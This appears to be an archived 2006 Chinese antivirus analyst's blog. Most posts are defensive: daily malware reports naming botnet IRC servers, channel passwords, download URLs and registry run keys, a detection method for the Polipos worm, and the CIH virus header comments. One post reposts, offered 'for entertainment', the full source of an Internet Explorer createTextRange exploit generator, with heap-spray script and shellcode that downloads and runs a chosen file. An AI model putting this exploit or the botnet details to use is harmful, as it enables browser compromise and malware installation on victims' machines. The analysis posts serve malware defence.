加糖苦咖啡 | daishuo's blog

我的博客搬家啦！

daishuo — Sat, 15 Jul 2006 01:24:00 +0000

已经正式落户百度空间。欢迎大家访问！

http://hi.baidu.com/daishuo

纪念4.26——CIH日

daishuo — Wed, 26 Apr 2006 02:02:00 +0000

; ********************************************************************
; * The Virus Program Information                                    *
; ********************************************************************
; *                                                                  *
; * Designer : CIH Original Place : TTIT of Taiwan                   *
; * Create Date : 04/26/1998 Now Version : 1.2                       *
; * Modification Time : 05/21/1998                                   *
; *                                                                  *
; *==================================================================*
; * Modification History                                             *
; *==================================================================*
; * v1.0 1. Create the Virus Program.                                *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.                *
; * 04/26/1998 3. Virus Code doesn't Reload into System.             *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System.     *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.      *
; * 6. When System Opens Existing PE File, the File will be          *
; * Infected, and the File doesn't be Reinfected.                    *
; * 7. It is also Infected, even the File is Read-Only.              *
; * 8. When the File is Infected, the Modification Date and Time     *
; * of the File also don't be Changed.                               *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call      *
; * Previous FileSystemApiHook, it will Call the Function            *
; * that the IFS Manager Would Normally Call to Implement            *
; * this Particular I/O Request.                                     *
; * 10. The Virus Size is only 656 Bytes.                            *
; *==================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase  *
; * it's Size... ^__^                                                *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.      *
; * When Exception Error Occurs, Our OS System should be in          *
; * Windows NT. So My Cute Virus will not Continue to Run,           *
; * it will Jmup to Original Application to Run.                     *
; * 3. Use Better Algorithm, Reduce Virus Code Size.                 *
; * 4. The Virus "Basic" Size is only 796 Bytes.                     *
; *==================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...        *
; * 2. Modify the Bug of v1.1                                        *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.              *
; ********************************************************************

P2P-Worm.Win32.Polipos.a的查杀原理(初步)

daishuo — Wed, 26 Apr 2006 01:32:00 +0000

24号下班前，收到小陌的MSN消息，关于P2P-Worm.Win32.Polipos.a这个病毒的。惭愧得很，前2周一直在做项目开发，病毒分析工作扔下了，以致在小陌给我发信息前，都没有听说过这个病毒。病毒资料在小陌的blog上已经有了，白天我看了一下这个毒，主要目的是查杀。
Polipos这个病毒用了变形引擎，每次感染的代码和数据都不同。我看了10分钟左右，觉得写一个搞定变形引擎的模块，工作量至少要2、3天。所以暂停了对变形代码的跟踪。在虚拟机里运行病毒，得到了几个感染样本。从感染样本中总结规律：
1、从被感染的样本来看，比原来多了一个节，节名为8个0字节，大小不定，60K左右，节属性为0xe0000060。
2、病毒用了EPO，替换原程序中对某个API的调用指令(call ds:[API地址])，用相对地址调用的方式(call virus_Entry)进入病毒入口函数。被替换的API是随机选择的，源程序中所有call ds:[API地址]语句都被替换了。
3、病毒入口函数是变形的，但最初几条语句总是：
push ebp
mov ebp, esp
sub esp, ??
pusha

      对Polipos.a病毒进行检测，可以从下面几点入手：
step 1、根据新增病毒节的特征，可以快速排除绝大多数正常程序；
step 2、读取病毒节数据，根据病毒入口函数初始代码的特点，全文扫描可能的病毒入口地址；
step 3、读取代码节(程序入口所在节)数据，全文扫描对可能病毒入口的调用语句。
      根据后来的实验显示，step 2找到的可能入口大约在15～25个，记录这些可能入口地址的包围盒(最大最小值)可以大幅优化step 3的执行速度。step 3可能找到多个调用语句，只选取最先找到的一个(因为病毒会在代码节后面的空隙处插入代码)。
     step 3结果不为空的样本，足以判断是病毒，误报率也应接近于0。

      通过检测模块，可以确定病毒入口地址。最基本的修复工作是：将程序中所有对病毒入口的调用语句还原成对API的调用。这里最大的难题在于，如果不搞定变形引擎，无法直接知道病毒替换了对哪个API的调用语句。
有一种间接方案可以考虑：
step 1、遍历Import表，记录所有API的位置；
step 2、全文扫描代码节，记录对各个API的引用情况；
step 3、如果step 2结果显示存在且仅存在1个未被引用的API，那么这个API就是被病毒替换的。
      需要说明的是step 2，通常编译器生成的调用API的代码有下面3种方式：
#1, call ds:[API地址]
#2, mov reg32, ds:[API地址]
    call reg32
#3, call jmp_API
jmp_API:
    jmp ds:[API地址]
     实验证明，对于病毒样本，step 3有时会找不到未被引用的API，这个概率接近15%。原因是编译器生成的代码中，对同一API可能应用不同方式的调用代码，而病毒替换的只是call ds:[API地址]这一种方式而已。
约15%清除失败的概率，使得本文描述的解决方案只能成为“初步”方案。这个初步方案的最大好处是完全绕开了变形引擎，因此实现起来工作量较小。代码完成，400行左右的规模，准备随KV 4月26日上午升级入库。

昨日病毒(2006.04.03)

daishuo — Tue, 04 Apr 2006 04:53:00 +0000

昨日病毒

统计时段

2006-4-3

病毒样本上报数排行

样本文件名

上报次数

mssave.exe

562

extrmous.exe

528

explore.exe

497

guest.exe

245

phost.exe

218

lup.exe

184

mssvcc.exe

146

newname8.exe

140

mousepad8.exe

113

winsystems.exe

108

keyboard8.exe

技术分析

mssave.exe

Backdoor/Agobot.chy

大小99K，经过MEW压缩处理。

1、病毒运行后，将自身复制到%SystemDir%文件夹，文件名随机。并在注册表创建启动项，指向病毒程序，如：

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Microsoft System Saver”=”flcnfm.exe”

2、结束多种安全软件和病毒的进程，通过修改hosts文件，屏蔽多个安全网站

3、尝试连接多个IRC服务器接收黑客命令，这些IRC服务器有：

paper.no-ip.biz
holdon.dyndns.org
casi.blogdns.com
comevisit.mentalstate.info
itsthat.mentalstate.info
whore.3xperienced.info
urknot.3xperienced.info
todayis.w33d420.be
digital.w33d420.be
hittin.w33d420.be
billysmells.micr0s0cks.info
buysome.micr0s0cks.info
yes.micr0s0cks.info
udontknow.makaveli7.be
philosophe.makaveli7.be
amalive.makaveli7.be
tupac.makaveli7.be

4、具有反调试功能，可以自动检测SoftICE、VMWare等环境，并向IRC服务器报告，有助于黑客屏蔽IP。

5、通过多种漏洞传播。传播过程中发送大量数据包，可造成染毒计算机运行速度下降，局域网拥堵。

extrmous.exe

Backdoor/Agobot.chv

1、病毒运行后，将创建下列文件：
%SystemDir%\extrmous.exe, 262656字节

2、在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Mouse Adaptor” = extrmous.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
“Mouse Adaptor” = extrmous.exe
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Mouse Adaptor” = extrmous.exe
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
“Mouse Adaptor” = extrmous.exe
这样，在Windows启动时，病毒就可以自动执行。

3、连接IRC服务器n2.exceed-speed.info接收并执行黑客命令。

4、通过多种系统漏洞传播，可造成中毒计算机运行速度下降，局域网拥堵。

botnet:

n2.exceed-speed.info:10002

PASS sooperdooper

JOIN #nextone# superbots

explore.exe

Backdoor/Agobot.chw

1、病毒运行后，将创建下列文件：
%SystemDir%\explore.exe, 111616字节
2、在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“1337 virus” = explore.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
“1337 virus” = explore.exe
这样，在Windows启动时，病毒就可以自动执行。

3、连接IRC服务器irc.kr3wzb4se.info接收并执行黑客命令。
4、通过多种系统漏洞传播，可造成中毒计算机运行速度下降，局域网拥堵。

guest.exe

Trojan/Delf.kp

1、病毒运行后，将创建下列文件：
%SystemDir%\intasks.exe, 25671字节
%SystemDir%\msinetes.inf, 309字节
%SystemDir%\msinetes.pnf, 3304字节
%SystemDir%\svchest.exe, 15872字节
%SystemDir%\winpub.reg, 540字节

2、在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“MSService” = svchest.exe
这样，在Windows启动时，svchest.exe就可以自动执行。

3、建立下面服务：

服务名称：Msisvr

服务描述：管理Internet 信息服务管理以及NetBIOS 名称解析的支持。

服务程序：%SystemDir%\INTasks.exe

这样，在Windows启动时，INTasks.exe就可以自动运行。

4、svchest.exe运行后，设置IE主页、搜索页地址为http://xp2006.3322.org；自动打开网页http://www.71791.com, http://www.71791.com/news, http://www.71791.com/goodvip, http://www.71791.com/mm；下载并执行http://xingz.3322.org/images/guest.exe

5、INTasks.exe运行后，负责恢复1、2、3中的病毒文件、注册表数据和服务信息。

phost.exe

TrojanProxy.Ranky.dn

木马代理，大小176K，经Asprotect加壳处理。

1、病毒运行后，在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“syshost.exe” = phost.exe
这样，在Windows启动时，病毒就可以自动执行。
2、开启后门代理端口，可供黑客远程使用，成为黑客进行黑客活动的跳板。

lup.exe	Backdoor.Agobot
mssvcc.exe	Backdoor.Agobot

高波病毒的变种，详细分析报告请参考“昨日病毒(2006.03.13)”中关于lup.exe/mssvcc.exe早先变种的报告。

newname8.exe	TrojanDownloader.VB.jr
mousepad8.exe	TrojanClicker.Small.gdh
keyboard8.exe	TrojanDownloader.VB.jq

keyboard8.exe是个木马下载器。
运行后，首先向一个网络asp脚本提交新增感染报告，提交形式如下：
http://www.nonameforthisdomain.com/teller2.asp?rnd=[随机数]
然后获得一个要下载程序的列表：
http://www.nonameforthisdomain.com/data.asp?rnd=[随机数]&antisp=1
当前下载列表的内容如下：
http://content.dollarrevenue.com/keyboard8.exe，就是keyboard2.exe本身
http://content.dollarrevenue.com/mousepad8.exe，一个广告点击程序，可能弹出广告窗口
http://content.dollarrevenue.com/newname8.exe，木马下载器

winsystems.exe

Backdoor/Agobot.chx

1、病毒运行后，将创建下列文件：
%SystemDir%\winsystems.exe, 80842字节
2、在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“winsystems25″ = winsystems.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
“winsystems25″ = winsystems.exe
这样，在Windows启动时，病毒就可以自动执行。
3、连接IRC服务器boughtem.nowslate1703.info，接收并执行黑客命令

4、通过多种系统漏洞传播，传播过程中发送大量数据包，可造成中毒计算机运行速度下降，局域网拥堵。

botnet:

boughtem.nowslate1703.info:22430

JOIN ##ploit,##ploit2 he he

本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”

灰鸽子和网络色情钓鱼

daishuo — Sat, 01 Apr 2006 02:42:00 +0000

前些日子接到网友线报，反映有些人在QQ信息说明中打着色情交友的幌子传播病毒。当时好歹看了一下，然后就开始忙CMMI的工作，没有写到blog上。今天CMMI终于过了，突然想起这事来，补发一篇，希望能给那些用下半身思考的男性网友们提个醒，不要轻易上当

1、有几个QQ号的说明文字都包含下面字样“本人诚征男人一名……本人相册可供参考http://takephoto.ys168.com”。网址是一个永硕网络硬盘，上面有“我的照片！嘻嘻.scr”文件下载，该文件运行后，会显示一幅女孩图片，并释放出灰鸽子病毒。

2、有人打着网络视频的幌子传播病毒。我把网友提供的QQ号加为好友，下面是一段QQ聊天记录：

接收下来的所谓“视频冲浪观看软件.rar”实际上就是一个虚假的说明文档和一个灰鸽子2006病毒。

IE createTextRange漏洞文件下载木马生成器

daishuo — Mon, 27 Mar 2006 15:14:00 +0000

IE的createTextRange漏洞已经出来几天了。这个漏洞的利用代码依然会分配大量内存，总得来说，可以远程代码执行，自然是严重等级的漏洞，但利用起来代价很大，512M内存的机器上跑的话，也需要1～2分钟才会运行shellcode，所以今后它的泛滥程度会远低于WMF/HHCTRL/MHTML等漏洞。

在这里，转载一个利用createTextRange漏洞的文件下载木马生成器的源码，供从事系统安全的朋友们娱乐。其实，大家可能早就baidu到一些了，呵呵。

/* * * Internet Explorer "createTextRang" Download Shellcoded Exploit * Bug discovered by Computer Terrorism (UK) * http://www.computerterrorism.com/research/ct22-03-2006 * Reliable exploitation by Darkeagle of Unl0ck Research Team * http://www.milw0rm.com/exploits/1606 * * Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2 * Severity: Critical * Impact: Remote System Access * Solution Status: Unpatched * * E-Mail: atmaca@icqmail.com * Web: http://www.spyinstructors.com,http://www.atmacasoft.com * Credit to Kozan,Darkeagle,delikon,Stelian Ene * */ #include <windows.h> #include <stdio.h> #define BUF_LEN 0×1518 #define FILE_NAME "index.htm" char body1[] = "<input type=\"checkbox\" id=\"blah\">\r\n" "<SCRIPT language=\"javascript\">\r\n\r\n" "shellcode = unescape(\r\n" "\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n" "\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n" "\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n" "\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n" "\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n" "\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n" "\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n" "\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n" "\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n" "\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n" "\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n" "\t\"%u0065"; char body2[] = "\r\n\r\nbigblock = unescape(\"%u9090%u9090\");\r\n" "slackspace = 20 + shellcode.length\r\n\r\n" "while (bigblock.length < slackspace)\r\n" "\tbigblock += bigblock;\r\n\r\n" "fillblock = bigblock.substring(0, slackspace);\r\n\r\n" "block = bigblock.substring(0, bigblock.length-slackspace);\r\n\r\n" "while(block.length + slackspace < 0×40000)\r\n" "\tblock = block + block + fillblock;\r\n\r\n" "memory = new Array();\r\n\r\n" "for ( i = 0; i < 2020; i++ )\r\n" "\tmemory[i] = block + shellcode;\r\n\r\n" "var r = document.getElementById(‘blah’).createTextRange();\r\n\r\n" "</script>\r\n"; int main(int argc,char *argv[]) { if (argc < 2) { printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit"); printf("\nUsage:\n"); printf(" ie_exp <WebUrl>\n"); return 0; } FILE *File; char *pszBuffer; char *web = argv[1]; char *pu = "%u"; char u_t[5]; char *utf16 = (char*)malloc(strlen(web)*5); if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) { printf("\n [Err:] fopen()"); exit(1); } pszBuffer = (char*)malloc(BUF_LEN); memcpy(pszBuffer,body1,sizeof(body1)-1); memset(utf16,’\0′,strlen(web)*5); for (unsigned int i=0;i<strlen(web);i=i+2) { sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]); strcat(utf16,u_t); } strcat(pszBuffer,utf16); strcat(pszBuffer,"%u0000\");"); strcat(pszBuffer,body2); fwrite(pszBuffer, BUF_LEN, 1,File); fclose(File); printf("\n\n" FILE_NAME " has been created in the current directory.\n"); return 1; } // milw0rm.com [2006-03-23] </body> </html>

昨日病毒(2006.03.24)

daishuo — Sun, 26 Mar 2006 04:47:00 +0000

昨日病毒

统计时段

2006-3-24

病毒样本上报数排行

样本文件名

上报次数

icntrl.exe

222

lup.exe

149

mssvcc.exe

130

wuass32.exe

mssm32.exe

技术分析

icntrl.exe

Backdoor/Agobot

1、大小220K~240K左右，是个高波病毒变种。运行后，建立下面文件：

%SystemDir%\icntrl.exe

创建服务：NtDIC，服务描述：Nt network domain internet connectivity checker.

服务程序指向icntrl.exe。这样病毒可以随Windows系统自动启动。

2、通过多种系统漏洞传播，在传播过程中，会扫描局域网内的计算机，发送大量数据包，造成中毒计算机CPU占用率很高，局域网拥堵。

3、连接IRC服务器frayedendsofsanity.be接收并执行黑客命令。

botnet:

frayedendsofsanity.be:5599

##meth metal

lup.exe	Backdoor/Agobot
mssvcc.exe	Backdoor/Agobot

这2个是高波的变种，请参考昨日病毒（2006.03.16-03.17）和昨日病毒（3月13日）

mssm32.exe

TrojanProxy.Agent

1、病毒运行后，将创建下列文件：
%SystemDir%\mssm32.exe, 21253字节
在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Microsoft (R) Windows Security Manager” = %SystemDir%\mssm32.exe
这样，在Windows启动时，病毒就可以自动执行。

2、打开后门代理TCP端口24027，可供黑客远程使用，作为跳板，进行黑客行为。

3、感染计算机后，向sophos.inlandloan.com发送UPD包，报告感染信息。

wuass32.exe

TrojanProxy.Agent

1、病毒运行后，将创建下列文件：
%SystemDir%\wuass32.exe, 21953字节
在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Microsoft (R) User Authorization Service” = %SystemDir%\wuass32.exe
这样，在Windows启动时，病毒就可以自动执行。

2、打开后门代理TCP端口3557，可供黑客远程使用，作为跳板，进行黑客行为。

本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”

昨日病毒(2006.03.23)

daishuo — Fri, 24 Mar 2006 05:05:00 +0000

昨日病毒

统计时段

2006-3-23

病毒样本上报数排行

样本文件名

上报次数

newname5.exe

197

mousepad5.exe

194

keyboard5.exe

164

dpnss32.exe

113

技术分析

newname5.exe	TrojanDownloader
mousepad5.exe	TrojanClicker
keyboard5.exe	TrojanDownloader

和以前描述过的keyboard2.exe, keyboard3.exe, keyboard4.exe功能类似，是个变种。
keyboard5.exe是个木马下载器。
运行后，首先向一个网络asp脚本提交新增感染报告，提交形式如下：
http://www.nonameforthisdomain.com/teller2.asp?rnd=[随机数]
然后获得一个要下载程序的列表：
http://www.nonameforthisdomain.com/data.asp?rnd=[随机数]&antisp=1
当前下载列表的内容如下：
http://content.dollarrevenue.com/keyboard5.exe，就是keyboard5.exe本身
http://content.dollarrevenue.com/mousepad5.exe，一个广告点击程序，可能弹出广告窗口
http://content.dollarrevenue.com/newname5.exe，木马下载器

dpnss32.exe

TrojanProxy.Ranky

病毒运行后，将创建下列文件：
%SystemDir%\dpnss32.exe, 21257字节
在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Microsoft (R) Windows Data Execution Prevention Service” = %SystemDir%\dpnss32.exe
这样，在Windows启动时，病毒就可以自动执行。

开启后门代理端口TCP 7328, 黑客可以远程使用这些代理端口，将被感染计算机作为跳板（代理），进行黑客活动。

本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”

昨日病毒(2006.03.22)

daishuo — Fri, 24 Mar 2006 05:03:00 +0000

昨日病毒

统计时段

2006-3-22

病毒样本上报数排行

样本文件名

上报次数

313.exe

175

iplus.exe

技术分析

313.exe

Backdoor/SdBot.cxe

1、病毒运行后，将创建下列文件：
%SystemDir%\313.exe, 82709字节
在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Microsoft System” = 313.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
“Microsoft System” = 313.exe
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Microsoft System” = 313.exe
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
“Microsoft System” = 313.exe
这样，在Windows启动时，病毒就可以自动执行。

2、利用多种系统漏洞进行传播。会扫描局域网内存在漏洞的计算机，发送大量数据包，可以造成局域网拥堵甚至瘫痪。

3、连接irc服务器221.2.51.204:65146，接收黑客命令。
botnet:
221.2.51.204:65146
#google g00gle

iplus.exe

TrojanDownloader

一个下载器，运行后首先从http://www.yeacool.net/update/update.txt得到要下载的程序列表，然后下载并运行列表上的网络程序。会安装播霸、Vika阅读器、快搜IE插件等。

本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”

昨日病毒(2006.03.20)

daishuo — Fri, 24 Mar 2006 05:02:00 +0000

昨日病毒

统计时段

2006-3-20

病毒样本上报数排行

样本文件名

上报次数

bmnss.exe

217

mousepad4.exe

151

newname4.exe

150

keyboard4.exe

108

技术分析

bmnss.exe

Backdoor/Agobot

1、病毒运行后，将创建下列文件：
%SystemDir%\bmnss.exe, 257024字节
在注册表中添加下列启动项：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Critical Runtime Indexer” = bmnss.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
“Critical Runtime Indexer” = bmnss.exe
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“Critical Runtime Indexer” = bmnss.exe
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
“Critical Runtime Indexer” = bmnss.exe
这样，在Windows启动时，病毒就可以自动执行。

2、利用多种系统漏洞进行传播。会扫描局域网内存在漏洞的计算机，发送大量数据包，可以造成局域网拥堵甚至瘫痪。

3、连接irc服务器64.33.201.123:6522，接收黑客命令。
botnet:
64.33.201.123:6522 nubbie
#oldone# oldboot

mousepad4.exe	TrojanDownloader
newname4.exe	TrojanClicker
keyboard4.exe	TrojanDownloader

和以前描述过的keyboard2.exe, keyboard3.exe功能类似，是个变种。
keyboard4.exe是个木马下载器。
运行后，首先向一个网络asp脚本提交新增感染报告，提交形式如下：
http://www.nonameforthisdomain.com/teller2.asp?rnd=[随机数]
然后获得一个要下载程序的列表：
http://www.nonameforthisdomain.com/data.asp?rnd=[随机数]&antisp=1
当前下载列表的内容如下：
http://content.dollarrevenue.com/keyboard4.exe，就是keyboard4.exe本身
http://content.dollarrevenue.com/mousepad4.exe，一个广告点击程序，可能弹出广告窗口
http://content.dollarrevenue.com/newname4.exe，木马下载器